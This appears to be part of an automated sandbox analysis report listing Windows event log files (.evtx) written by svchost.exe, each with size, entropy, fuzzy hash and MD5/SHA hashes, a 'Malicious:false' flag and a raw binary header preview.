                                                Preview:ElfChnk.....................................8.......I#.e......................................................................hB................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.143020267699133
                                                Encrypted:false
                                                SSDEEP:384:/3hDIEQAGxIHIFIWwIfyITMIcIZIMIf0ITEIAI/IuIGvqIfIOIOIv0IfCOiIThIZ:/3ZxGe6dBE
                                                MD5:F82F4FB7DA4AB67408D6CCD9970F9030
                                                SHA1:D341E0589D4D7F0428A2CABB79F2E0688CE14764
                                                SHA-256:9BA82CC57FBF6109BCABB327261B5FE25EB084B6EBD2A4728110F9A49DFDD437
                                                SHA-512:BADDC1224858BA7CF9A0AE70CF54D72EA85C3659D40DCD2ABE70601EC727CD2D2F421EE767298B52286F5BB185237FCDA5C1AF0FA164BBB021E6883E4DA772D0
                                                Malicious:false
                                                Preview:ElfChnk.T...............T...........................U..7.....................................................................n..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1............................V...........6..........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.800476718060657
                                                Encrypted:false
                                                SSDEEP:384:7h6iIvcImIvITIQIoIoI3IEIMIoIBIzI9IwWInIE1IFtI:7oxqV
                                                MD5:F25E3A5940E51F9A49AC271DE377E2C1
                                                SHA1:38EB4D0BCB8EA4C72C03AD88CF9B7136C39BCDC5
                                                SHA-256:D2B29761907A72BE3EC03C586D87729FF91EE3D9A6CF39319FD90A1977602663
                                                SHA-512:CADA8EFD9868D26AA1B4DBC5A5BDD31E624547E5755ED7B413EA74D69AB731B000BB2B8FCBDD3027FDA278A7D69058DF4BE3BAEE5AB253055C70EDE7D3AA9993
                                                Malicious:false
                                                Preview:ElfChnk.....................................X"...#.../......................................................................V)..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.999140584854273
                                                Encrypted:false
                                                SSDEEP:768:q4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH135:o
                                                MD5:5234109523F4243D8DFEEAFD9202BC60
                                                SHA1:49A4B237FB8BEE3A2BDAA0C20A579E06D2645F65
                                                SHA-256:D4CE68FD0E970CC24971E8258B962534A3BF7CB1F1E6209AA0BB1D09F4FB80E6
                                                SHA-512:C2CC9A4E7282BF37C4113FADBA4F7FDD1D2094B8F40FE145C58A5ABEE4A90BCD55FBD8876415BD9140EBEE36314D02FEE5525076B539BB5AA01FB1D32058B426
                                                Malicious:false
                                                Preview:ElfChnk.....................................(...8...|.........................................................................6................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):67224
                                                Entropy (8bit):3.9433898140664385
                                                Encrypted:false
                                                SSDEEP:768:Rp07SZRcZv76NcRkpHrWbGyYKQc90XZztputDBjV8k+ulVeUtHpoVWWMjRKvc90X:XztputDBjV8k+uPPtHpoVW
                                                MD5:D6498A45C3E70CC8E1836B96ECCE8213
                                                SHA1:1F3BF9675A7A661650A5C1834B6969D3D29806B0
                                                SHA-256:EC44B770767642BAF93499CB9EA99627BD0F4EAB4DA264C5B9F4DBF11F2D20D9
                                                SHA-512:F0A7E5009588BE525AE57D054F14EBB42E49020B5CEBE77DF1EB196D0F44B77A456849AC0C864640AB9DD62039D2D5D02708444713E0C78EA8A9A045A9AF02E4
                                                Malicious:false
                                                Preview:ElfChnk.................J.......R...............@.........................................................................0.7N................2...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...P...........MQ.........Z..&...............................................................8.......P.....!.....................MQ..0.U.f.....U.f...........P........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L..........u.e. x...**......Q...........MQ.........Z..&...............................................................8.......P...C.

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.419469524959014
                                                Encrypted:false
                                                SSDEEP:384:KhWKyzK5SK+jKLSKDlKMAwpTKZDGKPK9KyKJSK2KVKzKAGP1K6GSKzKhMK7KS3KM:KIgpCnz/Gh4wRub4OYP7DedGDg
                                                MD5:D2C2C9CBC79955E56A7C6CEFDDA7BA26
                                                SHA1:275CE6B6EB6360FA5B87EA7D1675475EB1DB68C2
                                                SHA-256:28F052B8DF205269D84E711CA3784656959F123CAE15778D6852FD9120C838BB
                                                SHA-512:A9A13D340F157371C447F255561AE24EC67960F7DA743B48BC487DB5F0923F2F5FD90B443F45D5762806DA0C619115FDEBDF6F13339A2B283E424F7C8DCCFA32
                                                Malicious:false
                                                Preview:ElfChnk.........[...............[...........`................................................................................'.p................p...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................'f.......D...T.......................s..........O....p...h............../$...............}..**................qdf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.760021633915647
                                                Encrypted:false
                                                SSDEEP:384:4hP8o8Z85848V8M8g8D8R8E8C888FB8J8a8:4R
                                                MD5:91415CB1A68CB19DCDB017402AAEB51E
                                                SHA1:EEEB808B9D0DFB3DB247AA10B64290A5029EAB89
                                                SHA-256:EDEE7AB462BF2D986393D24304BDEF02415A6E0483DE793BD452E169B7D08170
                                                SHA-512:C2F5AF43559DCE7BB66ABE305DF2DCFF0C95E2CF431D8DD0B6A02E216C8F4329C3B888BF2BF378918851A3066976FCEE745593B60970E5B9843535E6301E5BA0
                                                Malicious:false
                                                Preview:ElfChnk.........................................8!..$.0v....................................................................>...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.764237940848338
                                                Encrypted:false
                                                SSDEEP:1536:pXhVUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:pXjnS
                                                MD5:BE74B579A16D1AED2F3F05666BFFF507
                                                SHA1:CDB750EBABBDBAAB19603DF3D308AC37E0C0B435
                                                SHA-256:6CFAB54B8CFCDC5BC8F0E6ED1B82C332FB1494C683DDB662B2F623A166CE2B3E
                                                SHA-512:2CDA0F0F4C49763CC28ED2D832FE1792D9F69A42968CD5BDCD93C09C84F1CDD28FF26CDF40FE8F9388EFB57638B46C5D208868C09B4126255A0290EC436ABC7F
                                                Malicious:false
                                                Preview:ElfChnk.........'...............'............I...J...::o......................................................................$................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................>..............O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.4373812410985773
                                                Encrypted:false
                                                SSDEEP:768:50VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OaafcmafEMXW0OWkjWr:jcEt
                                                MD5:5166C2E32BD35C5E8D122799E53B4EA3
                                                SHA1:628619C0E31F8C29ED260FCC063CD27935ACC25C
                                                SHA-256:433A96E20784F1E6FB099FA4AB020EEA75BB22EEBC7D969497A31ABCB9B415AB
                                                SHA-512:E5EA93AA871264E180BBC67008D7AA1012CDCAC74D22D10B47F1849380E092DF2FD798C7143DD3CAB5D9192EB4A89BB0EE60DA662E626923551906AB8F31DFD9
                                                Malicious:false
                                                Preview:ElfChnk.........?...............?............y...{...v.......................................................................bV................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&.......>h..................................................%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):78040
                                                Entropy (8bit):4.115013899087152
                                                Encrypted:false
                                                SSDEEP:384:rhNiGQ5XpvVRYBQf5pJiT5pwiT5yY4iT5pBiT5pJk5pbik5pKik5yY5Lbik5p9io:rSLpBVi7CPqmxVSeX
                                                MD5:18C42CC9576AB51208AD3B294518C03D
                                                SHA1:545270AD7D05A2D8B791831F27940E8E21725842
                                                SHA-256:377177DA58CBFE0589BDC77079F18C4D5E3BFF3179F71AF0BD311A54C0B9FF1B
                                                SHA-512:2327FCD57BF41A236CD2E675436420C928D4DC4C3095168F35B9827F671CF6575FF9A69AECB9E20E6CFBF2976473F6E5E12EF4F62E6AEEEE3143F303A3F0D793
                                                Malicious:false
                                                Preview:ElfChnk.'.......+.......'.......+............$..`+..gv,......................................................................O..................X...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................1...............................................................&.......................................**......'...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.322146858454247
                                                Encrypted:false
                                                SSDEEP:384:NH6/hDGCyCkCzCRCFC5CdCbCHCQCrlC+C2CV2CfCrUCECZ/C/C/2a22j2EW2z2/5:NH6/d7kNrTgt
                                                MD5:D8DABE7AC7FE8F2D1CD853002971BB8A
                                                SHA1:AC6B0F9940C1B3DB1FBC58DE8A95DD252FA73A6A
                                                SHA-256:DDC0E74C04DFDB71841128067C33E0B5388CC5E93EEA1FDA4ADDFC6CA39FCC77
                                                SHA-512:A9AF55922FC793B10A17731BC7F83A70E741E695B47249993530612A11D0A41481068A4DFD4B07182F5604A4AE289211D00766B79DB67CC25171D4ECA5A9292A
                                                Malicious:false
                                                Preview:ElfChnk.U...............U...................`...h....fyC......................................................................K................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................F..............................&...............................................nw..............iq......................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.475265357832672
                                                Encrypted:false
                                                SSDEEP:1536:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGDL+2ubu1ho7t8ckcXWIkFElThsk687vzGe:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGD+
                                                MD5:605D94FA0C65C59EECEECC2BEB2F61B5
                                                SHA1:28CA14F5E02A0A0348C4AC4A22BC228390B64F94
                                                SHA-256:4667182188A73611A09A2F2B7A5E623367634933BE49899E07ED2FFB99142381
                                                SHA-512:10CC31A6B3F5CC0AF090861E7EC615289DE4AB43E7B612F4F6518D6FEF8CD943E6A0F8A165AB4F6CAD5509575CC0C0D46960940799C95F1C6D6F103B4594EEA6
                                                Malicious:false
                                                Preview:ElfChnk.....................................0k...l..C.......................................................................2\x5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................6Y......................................**..............X.j[d.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.47111181083742
                                                Encrypted:false
                                                SSDEEP:1536:8yzFyQWsk4cLSKph9YC/cmqbL9tKGjDLSGUpBpJyGBppmNEyUV2xoHDMzYC43sU4:8yzFyNsk4cLSKph9YC/cmqb5tKGjDLSq
                                                MD5:5E1FCE5317D65136634A651297937B38
                                                SHA1:76B30C7A98943026B52FF9C36040E75F771A605D
                                                SHA-256:97CB1DC7D98E8177799093F6B03F93F8F770B4875B0488E797E5AE312F3527FA
                                                SHA-512:C6421F7D8870F74900FD184ED847716C3760DF96A27F719EC56B20055F0F1B336476739EA99BBDC403D519D00EEFCE9049275AF5283655CFBEC0B19048D436F2
                                                Malicious:false
                                                Preview:ElfChnk.+.......X.......+.......X............X..hZ..........................................................................._.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F................................................................................................O.......8..&.......AR...6..12...............:......**......+.......*^..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.517082344367377
                                                Encrypted:false
                                                SSDEEP:384:YjdAhA71d7587RS7a07DL7T7G7z7L7k7OXD7u7y7I717/7u7m727L07E7K72t7Rt:YBAiHEV6koTxbkeQEWi7Di
                                                MD5:2628D3458E9FBE638FC3A49E317866FA
                                                SHA1:8DB033ED373F8A837073679CE0F3B5DC1BD7085B
                                                SHA-256:D2B987B5AC61D1C66CACD6D0492AC4C4C316C9EE94638A0D312803BB9C24FD00
                                                SHA-512:6C3683E0A8CF261353830E1F2344A59428E55BBCAFE032AF52624FF961F28608C7E64134BBA4764DEB8885D384DFA593325DB889E9D752226FC29885E3520A67
                                                Malicious:false
                                                Preview:ElfChnk.....................................po..@q....`....................................................................\.$.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................e4.............../..s...........&................................................L..............e2......................**..H............<R.d.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.314954486903959
                                                Encrypted:false
                                                SSDEEP:384:5mhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauia:s6Ovc0S5UyEeDgLpIC4DoA4
                                                MD5:864CAA67E4BF2A335E088526FF347CD9
                                                SHA1:64E224001D864A18D4999F5D33A42C532877A361
                                                SHA-256:C904C319101B31E991343FC8FF2929F6841599C9DCC23AC6218272F630AD5894
                                                SHA-512:B899FA6CDC7D0F97BACCC9025516045878BBA58E86ADEA79AA164B3B27F00F6E52F8B8838210A3ECD0C0E6A20D9DD48A4A4754F7408C1DA5F1FDC2EE7A504231
                                                Malicious:false
                                                Preview:ElfChnk.........A...............A............u...v..........................................................................c.w.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................6f......w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.773262505715791
                                                Encrypted:false
                                                SSDEEP:384:bhGuZumutu4uEu5uOuDuyb2uPu1uVupUupu+R7udu4uEu1u0u8uhuluxuMuxuMuH:b/vI
                                                MD5:C06B3BF303EBDD17D76D87B596EE5407
                                                SHA1:BFC46338E3A89112D6D7E1CFF7A9FB5909DE6458
                                                SHA-256:26AB9FE5730119306B700304DF2B2C11C6E8322F29CAA9AD49CBBA968DD54CD9
                                                SHA-512:7CBD5FFB770669AC0295C6221E02D24C116F4B72E3D990F60D122B2AED3280075DA5C3DBCA8A5749F5E566920799087D1094ECB31B5937D8B78EFB40BEC0D0A2
                                                Malicious:false
                                                Preview:ElfChnk.........T...............T...........@........J......................................................................?..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................vN......................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.2371167268838485
                                                Encrypted:false
                                                SSDEEP:384:RhiAeCv4A+yMrAmA1AHA6AbAMAEAFmANA49ALAEAyKiAfAFgAw+AqAFAApjANAil:RCCvudb6KinaWRQJ4+8nEPDh0
                                                MD5:3F2115642206C3D448781C58F4EE8AF3
                                                SHA1:1408F4FF05D6887F74B445E296BC9B69163EDDAE
                                                SHA-256:84EF0FE4C7A64FA8200DEE7E064A658C2BB94A262A6DBD1353CB7EE458DF1684
                                                SHA-512:C3B530EA9AC3FD03615D91457CB88474254CCC6B53B3737C932690059274ED18552F40836F7CF78B698A650D636A93B72EC8C8E8057921A28CAF3718D18C85CC
                                                Malicious:false
                                                Preview:ElfChnk.........................................@....a..........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................5.................................................... ..........&................................$......**..`..............;f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.1631981097466806
                                                Encrypted:false
                                                SSDEEP:384:4hKpsdp90mp9b2p9iGp95ep94+p9/Kp9Wqp9tap98Cp9Pp96p9lp9za1p9Dp9Wpb:4cafg0Y
                                                MD5:CBAE5379AAAD2B6A84714F5CEA39ACFA
                                                SHA1:A1AC7C71917C9F27EDA9E17CF0CAD78FC07A82E5
                                                SHA-256:726B1343CDE4D4B7D2558B9B3E86DAD3782983304D0349974FFA7725D40A9D2B
                                                SHA-512:7A6DF8A6BDF99348719F7005EFD293089BDD9EB93E2801CB7F3F38C77717E1E47D496E7A1D8FA9FED8EC27D28946214B71C7B156A537B40112D4A76E38F968B8
                                                Malicious:false
                                                Preview:ElfChnk.........'...............'....................k......................................................................+N.>........................................<...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............E.yrf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.036288214996343
                                                Encrypted:false
                                                SSDEEP:384:vhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWB0:vwDoh1V00eB9iVsTBwMjO2
                                                MD5:80B64057A5C06D0016A06F2D493CF301
                                                SHA1:452FDD974A9D63E05AC2F9AE4199CFD0C7CDCD62
                                                SHA-256:5ABDEF24E5D651A400B36F57A109443BC4F1C975FDAEBB512ADE44935C8BEB1A
                                                SHA-512:4F9E119EDA7FEED0948DABBDE51C9CBD835DB19EE717F3ED6EB99A16240EB351C968F4A8C39E8BCA2124A0E8A1C53AE5CD8A7D7F61748AFDE0574FF675166F43
                                                Malicious:false
